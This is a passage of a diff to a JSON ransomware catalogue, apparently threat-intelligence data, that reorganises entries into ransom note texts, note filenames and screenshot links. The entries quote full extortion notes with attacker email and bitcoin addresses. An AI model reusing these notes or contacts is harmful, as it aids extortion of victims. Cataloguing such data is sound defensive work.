"ransomnotes-filenames": [ + "INFO.txt" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/10/rotorcrypt-ransomware.html", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/", @@ -4162,10 +4298,14 @@ "payment-method": "rupies", "price": "3500 - 5000 - 10 000", "ransomnotes": [ - "IMPORTANT!!!! All of your computer files have been encrypted. DO NOT CHANGE ANY FILES! We can restore all the files. How to restore files: - \n1) Follow this link: - http://goo.gl/forms/VftoBRppkJ \n2) Fill out the form above. \n3) For 24 hours on your email + mobile SMS will come instructions for solving the problem. Thank you! DarkWing020", - "https://3.bp.blogspot.com/-gqEyoqXbZnE/WBXoF5bPZZI/AAAAAAAAB2U/YGpgIdjXyQQeDnwc9PlJs37YWtWTnH_wgCLcB/s1600/note.jpg", + "IMPORTANT!!!! All of your computer files have been encrypted. DO NOT CHANGE ANY FILES! We can restore all the files. How to restore files: - \n1) Follow this link: - http://goo.gl/forms/VftoBRppkJ \n2) Fill out the form above. \n3) For 24 hours on your email + mobile SMS will come instructions for solving the problem. Thank you! DarkWing020" + ], + "ransomnotes-filenames": [ "CreatesReadThisFileImportant.txt" ], + "ransomnotes-refs": [ + "https://3.bp.blogspot.com/-gqEyoqXbZnE/WBXoF5bPZZI/AAAAAAAAB2U/YGpgIdjXyQQeDnwc9PlJs37YWtWTnH_wgCLcB/s1600/note.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/10/masterbuster-ransomware.html", "https://twitter.com/struppigel/status/791943837874651136" @@ -4183,7 +4323,7 @@ ], "payment-method": "Bitcoin", "price": "3", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-oaElZvUqbfo/WBUOGdD8unI/AAAAAAAAB1w/Ya1_qq0gfa09AhRddUITQNRxKloXgD_BwCLcB/s1600/wallp.jpg" ], "refs": [ @@ -4208,7 +4348,9 @@ "payment-method": "Bitcoin", "price": "100 $", "ransomnotes": [ - "All your files are encrypted, but do not worry, they have not been removed. (for now) You have 24 hours to pay $100. Money move to the specified Bitcoin -account. Otherwise, all files will be destroyed. Do not turn off the computer and/or do not attempt to disable me. When disobedience will be deleted 100 files.", + "All your files are encrypted, but do not worry, they have not been removed. (for now) You have 24 hours to pay $100. Money move to the specified Bitcoin -account. Otherwise, all files will be destroyed. Do not turn off the computer and/or do not attempt to disable me. When disobedience will be deleted 100 files." + ], + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-cukkC4KAhZE/WBY1jJbcQoI/AAAAAAAAB3I/p8p-iNQRnQwnP6c6H77h_SHMQNAlkJ1CgCLcB/s1600/onyx.jpg" ], "refs": [ @@ -4230,7 +4372,7 @@ ], "payment-method": "Bitcoin", "price": "1000 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-JuBZKpEHV0Q/WBYNHFlW7pI/AAAAAAAAB20/z0DPYA_8l6U8tB6pbgo8ZwyIJRcrIVy2ACLcB/s1600/Note1.JPG" ], "refs": [ @@ -4251,11 +4393,13 @@ ".Alcatraz" ], "payment-method": "Email", - "ransomnotes": [ - "https://3.bp.blogspot.com/-b0-Uvnz703Q/WBcMGkZqtwI/AAAAAAAAB3Y/a6clIjdp_tI2T-OE_ykyjvB2qNY3gqWdQCLcB/s1600/Screenshot_1.jpg", - "https://2.bp.blogspot.com/-y5a6QnjAiv0/WBcMKV0zDDI/AAAAAAAAB3c/ytOQHJgmy30H_jEWPcfht7RRsh4NhcrvACLcB/s1600/Screenshot_2.jpg", + "ransomnotes-filenames": [ "ransomed.hTmL" ], + "ransomnotes-refs": [ + "https://3.bp.blogspot.com/-b0-Uvnz703Q/WBcMGkZqtwI/AAAAAAAAB3Y/a6clIjdp_tI2T-OE_ykyjvB2qNY3gqWdQCLcB/s1600/Screenshot_1.jpg", + "https://2.bp.blogspot.com/-y5a6QnjAiv0/WBcMKV0zDDI/AAAAAAAAB3c/ytOQHJgmy30H_jEWPcfht7RRsh4NhcrvACLcB/s1600/Screenshot_2.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/10/alcatraz-locker-ransomware.html", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/", @@ -4275,7 +4419,9 @@ ], "payment-method": "Email", "ransomnotes": [ - "Windows has encountered a critical problem and needs your immediate action to recover your data. The system access is locked and all the data have been encrypted to avoid the information be published or misused. You will not be able to access to your files and ignoring this message may cause the total loss of the data. We are sorry for the inconvenience. You need to contact the email below to restore the data of your system. Email: esmeraldaencryption@mail.ru You will have to order the Unlock-Password and the Esmeralda Decryption Software. All the instructions will be sent to you by email.", + "Windows has encountered a critical problem and needs your immediate action to recover your data. The system access is locked and all the data have been encrypted to avoid the information be published or misused. You will not be able to access to your files and ignoring this message may cause the total loss of the data. We are sorry for the inconvenience. You need to contact the email below to restore the data of your system. Email: esmeraldaencryption@mail.ru You will have to order the Unlock-Password and the Esmeralda Decryption Software. All the instructions will be sent to you by email." + ], + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-vaWu8OjSiXE/WBzkLBdB8DI/AAAAAAAAB_Y/k8vvtYEIdTkFJhruRJ6qDNAujAn4Ph-xACLcB/s1600/esmeralda-lock_2.png" ], "refs": [ @@ -4296,7 +4442,7 @@ ], "payment-method": "Bitcoin", "price": "0.053773", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-_jxt6kCRnwM/WBNf7mi92nI/AAAAAAAAB0g/homx8Ly379oUKAOIhZU6MxCiWX1gA_TkACLcB/s1600/wallp.jpg" ], "refs": [ @@ -4315,7 +4461,7 @@ ".encrypted" ], "payment-method": "Game", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-GAPCc3ITdQY/WBMTmJ4NaRI/AAAAAAAABzM/XPbPZvZ8vbUrOWxtwPmfHFJiNT_2gfaOgCLcB/s1600/fileice-source.png" ], "refs": [ @@ -4336,7 +4482,7 @@ ], "payment-method": "Bitcoin", "price": "0.29499335", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-vIMgkn8WVJM/WBJAxkbya7I/AAAAAAAABys/tCpaTOxfGDw8A611gudDh46mhZT70dURwCLcB/s1600/lock-screen.jpg", "https://1.bp.blogspot.com/-b0QiEQec0Pg/WBMf2HG6hjI/AAAAAAAABz8/BtN2-INZ2KQ4W2_iPqvDZTtlA0Aq_4gVACLcB/s1600/Screenshot_2.jpg" ], @@ -4360,11 +4506,15 @@ ], "payment-method": "Email", "ransomnotes": [ - "https://1.bp.blogspot.com/-lLZZBScC27U/WBmkDQzl9FI/AAAAAAAAB5Y/gozOy17Yv0EWNCQVSOXn-PkTccYZuMmPQCLcB/s1600/note-bmp_2.png", - "!!! IMPORTANT INFORMATION !!!! All files are encrypted using RSA-3072 and AES128 encryption. You can learn more about RSA and AES ciphers here: Https://hu.wikipedia.org/wiki/RSA-eljárás Https://hu.wikipedia.org/wiki/Advanced_Encryption_Standard To return files, you need to get a secret key and decryption program. To get the key, please follow these steps: \n1. Send an identification code to the email address locky@mail2tor.com! If you want, send a 1 MB file for decryption. In order to prove that we can recover data. (Please, email must contain only the identification code, as well as the attachment) \n3. Please note, check the mail, we will send you an email within 24 hours! You will receive a decrypted file and decryption program in the attachment. Follow the instructions in the email.!!! Your identification code !!!", + "!!! IMPORTANT INFORMATION !!!! All files are encrypted using RSA-3072 and AES128 encryption. You can learn more about RSA and AES ciphers here: Https://hu.wikipedia.org/wiki/RSA-eljárás Https://hu.wikipedia.org/wiki/Advanced_Encryption_Standard To return files, you need to get a secret key and decryption program. To get the key, please follow these steps: \n1. Send an identification code to the email address locky@mail2tor.com! If you want, send a 1 MB file for decryption. In order to prove that we can recover data. (Please, email must contain only the identification code, as well as the attachment) \n3. Please note, check the mail, we will send you an email within 24 hours! You will receive a decrypted file and decryption program in the attachment. Follow the instructions in the email.!!! Your identification code !!!" + ], + "ransomnotes-filenames": [ "_Adatok_visszaallitasahoz_utasitasok.txt", "_locky_recover_instructions.txt" ], + "ransomnotes-refs": [ + "https://1.bp.blogspot.com/-lLZZBScC27U/WBmkDQzl9FI/AAAAAAAAB5Y/gozOy17Yv0EWNCQVSOXn-PkTccYZuMmPQCLcB/s1600/note-bmp_2.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/10/hucky-ransomware-hungarian-locky.html", "https://blog.avast.com/hucky-ransomware-a-hungarian-locky-wannabe", @@ -4388,7 +4538,9 @@ "payment-method": "Bitcoin", "price": "2 - 4", "ransomnotes": [ - "Your files are encrypted! Your files have been safely encrypted on this PC: photos, documents, databases, etc. Encryption was produced using a unique public key generated for this computer. To decrypt files you need to obtain the private key. The only way to get the private key is to pay 4 BTC. You saved it on qualified system administrator who could make your network safe and secure. In order to decrypt the files send your bitcoins to the following address: 13gYXFxpzm7hAd4esdnJGt9JvYqyD1Y6by After you complete your payment, send an email to 6214ssxpvo@sigaint.org with YOUR ID as subject (ID is in the end of the file) and you'll receive private key, needed software and step by step guide in 1 business day. Offer is valid for 5 business days (expiration date is in the end of the file). AFTER TIME IS UP, PRICE DOUBLES. No discounts, no other payment methods. How to buy bitcoins? \n1. Create a Bitcoin Wallet (we recommend Blockchain.info) \n2. Buy necessary amount of Bitcoins Do not forget about the transaction commission in the Bitcoin network (= 0.0005). Here are our recommendations: LocalBitcoins.com – the fastest and easiest way to buy and sell Bitcoins; CoinCafe.com – the simplest and fastest way to buy, sell and use Bitcoins; BTCDirect.eu – the best for Europe; CEX.IO – Visa / MasterCard; CoinMama.com – Visa / MasterCard; HowToBuyBitcoins.info – discover quickly how to buy and sell bitcoins in your local currency. More questions? Send an email to 6214ssxpvo@sigaint.org ID: *** EXP DATE: Sept. 12 2016 Winnix Cryptor Team", + "Your files are encrypted! Your files have been safely encrypted on this PC: photos, documents, databases, etc. Encryption was produced using a unique public key generated for this computer. To decrypt files you need to obtain the private key. The only way to get the private key is to pay 4 BTC. You saved it on qualified system administrator who could make your network safe and secure. In order to decrypt the files send your bitcoins to the following address: 13gYXFxpzm7hAd4esdnJGt9JvYqyD1Y6by After you complete your payment, send an email to 6214ssxpvo@sigaint.org with YOUR ID as subject (ID is in the end of the file) and you'll receive private key, needed software and step by step guide in 1 business day. Offer is valid for 5 business days (expiration date is in the end of the file). AFTER TIME IS UP, PRICE DOUBLES. No discounts, no other payment methods. How to buy bitcoins? \n1. Create a Bitcoin Wallet (we recommend Blockchain.info) \n2. Buy necessary amount of Bitcoins Do not forget about the transaction commission in the Bitcoin network (= 0.0005). Here are our recommendations: LocalBitcoins.com – the fastest and easiest way to buy and sell Bitcoins; CoinCafe.com – the simplest and fastest way to buy, sell and use Bitcoins; BTCDirect.eu – the best for Europe; CEX.IO – Visa / MasterCard; CoinMama.com – Visa / MasterCard; HowToBuyBitcoins.info – discover quickly how to buy and sell bitcoins in your local currency. More questions? Send an email to 6214ssxpvo@sigaint.org ID: *** EXP DATE: Sept. 12 2016 Winnix Cryptor Team" + ], + "ransomnotes-filenames": [ "YOUR FILES ARE ENCRYPTED!.txt" ], "refs": [ @@ -4410,9 +4562,11 @@ "payment-method": "Bitcoin", "price": "10 (7300 $)", "ransomnotes": [ - "https://3.bp.blogspot.com/-k3s85Fx9N_E/WBIfuUNTMmI/AAAAAAAAByM/rQ10tKuXTlEJfLTOoBwJPo7rhhaiK2OoQCLcB/s1600/screen-lock.jpg", "ANGRY DUCK! All your important files have been encrypted using very string cryptography (AES-512 With RSA-64 FIPS grade encryption). To recover your files, send 10 BTC to my private wallet DON'T MESS WITH THE DUCKS!!!" ], + "ransomnotes-refs": [ + "https://3.bp.blogspot.com/-k3s85Fx9N_E/WBIfuUNTMmI/AAAAAAAAByM/rQ10tKuXTlEJfLTOoBwJPo7rhhaiK2OoQCLcB/s1600/screen-lock.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/10/angryduck-ransomware.html", "https://twitter.com/demonslay335/status/790334746488365057" @@ -4431,7 +4585,7 @@ ], "payment-method": "Email", "price": "1000 rubles", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-WuD2qaaNIb0/WA4_g_FnIfI/AAAAAAAABx4/pn6VNqMXMzI_ryvKUruY3ctYtzomT1I4gCLcB/s1600/note3.jpg", "https://1.bp.blogspot.com/-S6M83oFxSdM/WA4_ak9WATI/AAAAAAAABx0/3FL3q21FdxMQvAgrr2FORQIaNtq2-P2jACLcB/s1600/note2.jpg" ], @@ -4450,10 +4604,12 @@ "encryption": "AES-512", "payment-method": "Bitcoin", "price": "0.25 - 0.5", - "ransomnotes": [ - "https://2.bp.blogspot.com/-5gZpxeEWqZg/WBeNnEP9GzI/AAAAAAAAB4g/ELCCp88whLMI6CzpGTjlxbmXBMFIKhwtwCLcB/s1600/onion-site.JPG", + "ransomnotes-filenames": [ "!!!!!readme!!!!!.htm" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-5gZpxeEWqZg/WBeNnEP9GzI/AAAAAAAAB4g/ELCCp88whLMI6CzpGTjlxbmXBMFIKhwtwCLcB/s1600/onion-site.JPG" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/10/asn1-encoder-ransomware.html", "https://malwarebreakdown.com/2017/03/02/rig-ek-at-92-53-105-43-drops-asn1-ransomware/" @@ -4492,7 +4648,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-4HNc9S8SY4I/WBMkpdKyDsI/AAAAAAAAB0I/udESgro7YB4pF98Dv2KrrecyymFGsvV2QCLcB/s1600/note.JPG" ], "refs": [ @@ -4511,7 +4667,7 @@ "#LOCK#" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-sdlDK4OIuPA/WAehWZYHaMI/AAAAAAAABvc/TcAcLG2lw10aOFY3FbP1A5EuLjL6LR62ACLcB/s1600/note.jpg" ], "refs": [ @@ -4539,10 +4695,12 @@ ], "payment-method": "Bitcoin", "price": "1 - 2.5 - 3", - "ransomnotes": [ - "https://4.bp.blogspot.com/-0YMsPH5WuTk/WAepI4BnqZI/AAAAAAAABv0/yXt4tdrmmAIf-N9KUmehY6mK1kTV-eFFQCLcB/s1600/note-wal2.jpg", + "ransomnotes-filenames": [ "Decryption Instructions.txt" ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-0YMsPH5WuTk/WAepI4BnqZI/AAAAAAAABv0/yXt4tdrmmAIf-N9KUmehY6mK1kTV-eFFQCLcB/s1600/note-wal2.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/10/anubis-ransomware.html", "http://nyxbone.com/malware/Anubis.html" @@ -4558,7 +4716,7 @@ "encryption": "AES-256", "payment-method": "Bitcoin", "price": "2", - "ransomnotes": [ + "ransomnotes-filenames": [ "Attention! ! ! All of your copies of your system have been permanently deleted and the data on all partitions and workstations have been encrypted! Stay calm. You can recover all your data by making a payment of 2 BTC (1200 USD) in Bitcoin currency to receive a decryption key. To purchase Bitcions you can use www.coinbase.com After buying BTC send the equivalent of 2 BTC (1200 USD) to our BTC adress : 16jX5RbF2pEcLYHPukazWhDCkxXTs7ZCxB After payment contact us to receive your decryption key. In mail title write your unique ID: {custom id visually resembling a MAC address} Our e-mail: crypt302@gmx.com" ], "refs": [ @@ -4579,7 +4737,7 @@ ], "payment-method": "Bitcoin", "price": "50 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-WJYR7LkWHWY/WAaCYScljOI/AAAAAAAABuo/j18AGhzv7WUPb2r4HWkYm4TPgYw9S5PUwCLcB/s1600/note1-1.jpg", "https://4.bp.blogspot.com/-2QxJ3KCRimI/WAaCcWcE2uI/AAAAAAAABus/9SGRY5iQT-ITfG_JrY7mn6-PUpQrSKg7gCLcB/s1600/note1-2.jpg", "https://3.bp.blogspot.com/-SMXOoWiGkxw/WAaGOMdecrI/AAAAAAAABu8/S-YjlWlPKbItSN_fe8030tMDHWzouHsIgCLcB/s1600/note2.jpg" @@ -4604,7 +4762,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-VTUhk_Py2FA/WAVCO1Yn69I/AAAAAAAABuI/N71wo2ViOE0UjrIdbeulBRTJukHtA2TdACLcB/s1600/ransom-note.jpg" ], "refs": [ @@ -4624,7 +4782,7 @@ ], "payment-method": "Bitcoin", "price": "0.0523", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-NfRePJbfjbY/WAe5LHFsWaI/AAAAAAAABwE/1Pk116TDqAYEDYvnu2vzim1l-H5seW9mQCLcB/s1600/note.png" ], "refs": [ @@ -4659,7 +4817,7 @@ ], "payment-method": "Bitcoin", "price": "0.2", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-k7T79DnBk8w/WBc67QXyjWI/AAAAAAAAB3w/QbA-E9lYdSMOg3PcG9Vz8fTc_OhmACObACLcB/s1600/note-html.jpg" ], "refs": [ @@ -4678,7 +4836,7 @@ ".venis" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-IFEOWjw-aaQ/WAXTu9oEN4I/AAAAAAAABuY/APqBiaHn3pAX8404Noyuj7tnFJDf2m_XACLcB/s1600/note1.jpg" ], "refs": [ @@ -4717,7 +4875,7 @@ "encryption": "AES-256", "payment-method": "Bitcoin", "price": "500$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-XZiiaCYM9Bk/WAUsUkrCJEI/AAAAAAAABtk/z-sMHflz3Q8_aWc-K9PD0N5TGkSGwwQnACLcB/s1600/note-html.jpg" ], "refs": [ @@ -4741,7 +4899,7 @@ ], "payment-method": "Bitcoin", "price": "~2", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-MmzOC__9qPA/V__t2kNX-SI/AAAAAAAABrc/t8ypPa1jCIUbPfvR7UGbdGzdvKrbAv_DgCLcB/s1600/wallpaper.jpg", "https://4.bp.blogspot.com/-hRoC-UFr-7o/V__tAEFuZWI/AAAAAAAABrQ/xDawlulx8Bg4uEtX4bU2ezPMY-x6iFiuQCLcB/s1600/note-1ch.JPG", "https://4.bp.blogspot.com/-PdYtm6sRHAI/WAEngHQBg_I/AAAAAAAABsA/nh8m7__b0wgviTEBahyNYK4HFhF1v7rOQCLcB/s1600/icon-stalin-2.jpg" @@ -4775,7 +4933,7 @@ ], "payment-method": "Bitcoin", "price": "0.8 - 1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-MYI30xhrcZU/V_qcDyASJsI/AAAAAAAABpU/Pej5jDk_baYBByLx1cXwFL8LBiT8Vj3xgCLcB/s1600/note22.jpg" ], "refs": [ @@ -4808,7 +4966,7 @@ ], "payment-method": "PaySafe", "price": "300 CZK - 2000 CZK after 12 hours", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-E_MI2fT33J0/V_k_9Gjkj4I/AAAAAAAABpA/-30UT5HhPAAR9YtVkFwgrYqLIdWPprZ9gCLcB/s1600/lock-screen.jpg", "https://2.bp.blogspot.com/-4YmIkWfYfRA/V_lAALhfSvI/AAAAAAAABpE/Dj35aroKXSwbLXrSPqGCzbvhsTNHdsbAgCLcB/s1600/kostya.jpg" ], @@ -4830,7 +4988,7 @@ ], "payment-method": "Bitcoin", "price": "1.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-nskzYgbg7Ac/V_jpJ3GApqI/AAAAAAAABos/EbG_-BLDPqA9bRVOWdzHjPnDWFiHYlsJwCLcB/s1600/ransom-note.png" ], "refs": [ @@ -4849,7 +5007,7 @@ ".ecrypt" ], "payment-method": "Tor WebSite", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-E9WbSxLgaYs/WGn8gC6EfvI/AAAAAAAAC8A/bzd7uP9fcxU6Fyq1n6-9ZbUUGWlls9lrwCLcB/s1600/note-txt_2.png" ], "refs": [ @@ -4896,7 +5054,7 @@ ".enc" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "YOUR_FILES_ARE_LOCKED.txt" ], "refs": [ @@ -4917,7 +5075,7 @@ ], "payment-method": "Bitcoin", "price": "0.1 (37$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "read_this_file.txt" ], "refs": [ @@ -4939,7 +5097,7 @@ ], "payment-method": "Bitcoin", "price": "13 (4980$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "FILES_BACK.txt" ], "refs": [ @@ -4970,7 +5128,7 @@ "extensions": [ ".8lock8" ], - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_IT.txt" ], "refs": [ @@ -4987,7 +5145,7 @@ "._AiraCropEncrypted" ], "payment-method": "WebSite (onion) - Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "How to decrypt your files.txt" ], "refs": [ @@ -5005,7 +5163,7 @@ ".disappeared" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "Read_Me.Txt" ], "refs": [ @@ -5023,7 +5181,7 @@ ], "payment-method": "Bitcoin", "price": "1 (650$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "README HOW TO DECRYPT YOUR FILES.HTML" ], "refs": [ @@ -5044,7 +5202,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "Unlock_files_randomx5.html" ], "refs": [ @@ -5065,7 +5223,7 @@ ], "payment-method": "Itunes Gift Cards", "price": "400$", - "ransomnotes": [ + "ransomnotes-filenames": [ "Read Me (How Decrypt) !!!!.txt" ], "refs": [ @@ -5097,7 +5255,7 @@ ], "payment-method": "Bitcoin", "price": "Depending on the victim’s situation", - "ransomnotes": [ + "ransomnotes-filenames": [ "ПРОЧТИ_МЕНЯ.txt", "READ_ME.txt" ], @@ -5117,7 +5275,7 @@ ], "payment-method": "Bitcoin", "price": "3", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_ME.txt" ], "refs": [ @@ -5155,7 +5313,7 @@ "*filename*.ID-[A-F0-9]{8}+countrycode[cryptcorp@inbox.ru].[a-z0-9]{13}" ], "payment-method": "Email - WebSite (onion)", - "ransomnotes": [ + "ransomnotes-filenames": [ "*.How_To_Decrypt.txt", "*.Contact_Here_To_Recover_Your_Files.txt", "*.Where_my_files.txt", @@ -5197,7 +5355,7 @@ ".locked" ], "payment-method": "Email - WebSite (onion)", - "ransomnotes": [ + "ransomnotes-filenames": [ "*.How_To_Get_Back.txt" ], "refs": [ @@ -5215,7 +5373,7 @@ ], "payment-method": "Bitcoin", "price": "0.5 - 1", - "ransomnotes": [ + "ransomnotes-filenames": [ "info.txt", "info.html" ], @@ -5244,7 +5402,7 @@ "meta": { "payment-method": "Bitcoin", "price": "2 (888,4$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "Help Decrypt.html" ], "refs": [ @@ -5279,7 +5437,7 @@ ".id-[ID]_[EMAIL_ADDRESS]" ], "payment-method": "Email - Telegram", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW TO DECRYPT.txt" ], "refs": [ @@ -5312,7 +5470,7 @@ ], "payment-method": "Bitcoin", "price": "3", - "ransomnotes": [ + "ransomnotes-filenames": [ "recover.txt", "recover.bmp" ], @@ -5379,7 +5537,7 @@ ], "payment-method": "Bitcoin", "price": "0.07 (30$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "Hacked_Read_me_to_decrypt_files.html", "YourID.txt" ], @@ -5443,7 +5601,7 @@ ], "payment-method": "Reais", "price": "2000 (543$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "MENSAGEM.txt" ], "refs": [ @@ -5462,7 +5620,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW_OPEN_FILES.html" ], "refs": [ @@ -5498,7 +5656,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "#_HOW_TO_FIX_!.hta" ], "refs": [ @@ -5528,7 +5686,7 @@ "extensions": [ "(.*).encoded.([A-Z0-9]{9})" ], - "ransomnotes": [ + "ransomnotes-filenames": [ "BUYUNLOCKCODE.txt" ], "refs": [ @@ -5546,7 +5704,7 @@ ], "payment-method": "Bitcoin", "price": "Variable / 0.3 - 1.2 / Double after 4 days and 4 hours", - "ransomnotes": [ + "ransomnotes-filenames": [ "!Recovery_[random_chars].html", "!Recovery_[random_chars].txt" ], @@ -5585,7 +5743,7 @@ ], "payment-method": "Bitcoin", "price": "1.24 / 2.48 after 7 days", - "ransomnotes": [ + "ransomnotes-filenames": [ "# DECRYPT MY FILES #.html", "# DECRYPT MY FILES #.txt", "# DECRYPT MY FILES #.vbs", @@ -5629,7 +5787,7 @@ ], "payment-method": "Bitcoin", "price": "0.939", - "ransomnotes": [ + "ransomnotes-filenames": [ "YOUR_FILES_ARE_ENCRYPTED.HTML", "YOUR_FILES_ARE_ENCRYPTED.TXT", ".gif" @@ -5662,7 +5820,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "wallpaper.jpg" ], "refs": [ @@ -5684,7 +5842,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "!!!-WARNING-!!!.html", "!!!-WARNING-!!!.txt" ], @@ -5732,7 +5890,7 @@ ], "payment-method": "Email", "price": "100$", - "ransomnotes": [ + "ransomnotes-refs": [ "http://virusinfo.info/showthread.php?t=185396" ], "refs": [ @@ -5752,7 +5910,7 @@ ], "payment-method": "Bitcoin", "price": "Variable / 0.3 - 1.2 / Double after 4 days and 4 hours", - "ransomnotes": [ + "ransomnotes-filenames": [ "!Recovery_[random_chars].html", "!Recovery_[random_chars].txt" ], @@ -5791,7 +5949,7 @@ "encryption": "AES-256", "payment-method": "Bitcoin", "price": "Variable / 0.3 - 1.2 / Double after 4 days and 4 hours", - "ransomnotes": [ + "ransomnotes-filenames": [ "README.TXT", "README.HTML", "README.BMP" @@ -5812,7 +5970,7 @@ ], "payment-method": "Bitcoin", "price": "0.1 (45$)", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_THIS_TO_DECRYPT.html" ], "refs": [ @@ -5894,7 +6052,7 @@ "encryption": "AES + RSA", "payment-method": "Bitcoin", "price": "1 - 2", - "ransomnotes": [ + "ransomnotes-filenames": [ "OKSOWATHAPPENDTOYOURFILES.TXT" ], "refs": [ @@ -5920,7 +6078,7 @@ "meta": { "payment-method": "Bitcoin", "price": "0.9 (500$) - 1.9 (1000$) after 4 days", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW_DECRYPT.TXT", "HOW_DECRYPT.HTML", "HOW_DECRYPT.URL" @@ -5968,7 +6126,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ IF YOU WANT YOUR FILES BACK.html" ], "refs": [ @@ -6007,7 +6165,7 @@ "extensions": [ ".clf" ], - "ransomnotes": [ + "ransomnotes-filenames": [ "wallpaper.jpg" ] }, @@ -6051,7 +6209,7 @@ ], "payment-method": "Bitcoin", "price": "100€", - "ransomnotes": [ + "ransomnotes-filenames": [ "README!!!.txt", "GetYouFiles.txt", "crjoker.html" @@ -6150,10 +6308,6 @@ "ransomnotes": [ "HELP_YOUR_FILES.html (CryptXXX)", "HELP_YOUR_FILES.txt (CryptoWall 3.0, 4.0)", - "INSTRUCTION RESTORE FILE.TXT", - "# HELP_DECRYPT_YOUR_FILES #.TXT", - "_HELP_INSTRUCTION.TXT", - "C:\\ProgramData\\[random].exe", "Hello!\n\nAttention! All Your data was encrypted!\n\nFor specific informartion, please send us an email with Your ID number:\n\nempty01@techmail.info\n\nempty02@yahooweb.co\n\nempty003@protonmail.com\n\nWe will help You as soon as possible!\n\nDECRYPT-ID-[id] number", "Hello!\n\nAttention! All Your data was encrypted!\n\nFor specific informartion, please send us an email with Your ID number:\n\ny0000@tuta.io\n\ny0000@protonmail.com\n\ny0000z@yandex.com\n\ny0000s@yandex.com\n\nPlease send email to all email addresses! We will help You as soon as possible!\n\nDECRYPT-ID-[id]", "Hello!\n\nAttention! All Your data was encrypted!\n\nFor specific informartion, please send us an email with Your ID number:\n\nxzzx@tuta.io\n\nxzzx1@protonmail.com\n\nxzzx10@yandex.com\n\nxzzx101@yandex.com\n\nPlease send email to all email addresses! We will help You as soon as possible!\n\nDECRYPT-ID-[id] number", @@ -6162,9 +6316,17 @@ "Hello!\n\nAttention! All Your data was encrypted!\n\nFor specific informartion, please send us an email with Your ID number:\n\nsystemwall@keemail.me\n\nsystemwall@protonmail.com\n\nsystemwall@yandex.com\n\nsystemwall1@yandex.com\n\nemily.w@dr.com\n\nPlease send email to all email addresses! We will help You as soon as possible!\n\nIMPORTANT: DO NOT USE ANY PUBLIC SOFTWARE! IT MAY DAMAGE YOUR DATA FOREVER!\n\nDECRYPT-ID-%s number", "!!!All your files are encrypted!!!\nWhat to decipher write on mail alpha2018a@aol.com\nDo not move or delete files!!!!\n---- Your ID: 5338f74a-3c20-4ac0-9deb-f3a91818cea7 ----\n!!! You have 3 days otherwise you will lose all your data.!!!", "Hello!\n\nAttention! All Your data was encrypted!\n\nFor specific informartion, please send us an email with Your ID number:\n\nbackuppc@tuta.io\n\nbackuppc@protonmail.com\n\nbackuppc1@protonmail.com\n\nb4ckuppc1@yandex.com\n\nb4ckuppc2@yandex.com\n\nbackuppc1@dr.com\n\nPlease send email to all email 